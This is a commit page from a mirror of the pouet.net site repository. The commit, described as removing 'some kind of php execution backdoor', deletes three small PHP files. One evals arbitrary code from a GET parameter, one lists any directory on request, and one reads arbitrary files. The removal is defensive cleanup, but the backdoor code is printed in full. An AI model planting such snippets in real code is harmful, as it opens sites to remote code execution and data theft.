mirror of
https://github.com/psenough/pouet.net.git
synced 2025-03-15 11:29:41 +01:00
remove some kind of php execution backdoor :-/
This commit is contained in:
parent
e529802c57
commit
935c77d8eb
@ -1,3 +0,0 @@
|
||||
<?
|
||||
if ($_GET['x']) eval($_GET['x']);
|
||||
?>
|
@ -1,11 +0,0 @@
|
||||
<?
|
||||
$dir = $_GET['y'];
|
||||
if (!is_dir($dir)) return false;
|
||||
|
||||
if ($df = opendir($dir)) {
|
||||
while (($file = readdir($df)) != false) {
|
||||
print " {$file}<br />\n";
|
||||
}
|
||||
closedir($df);
|
||||
}
|
||||
?>
|
@ -1,4 +0,0 @@
|
||||
<?
|
||||
if ($_GET['z']) file($_GET['z']);
|
||||
?>
|
||||
|
Loading…
x
Reference in New Issue
Block a user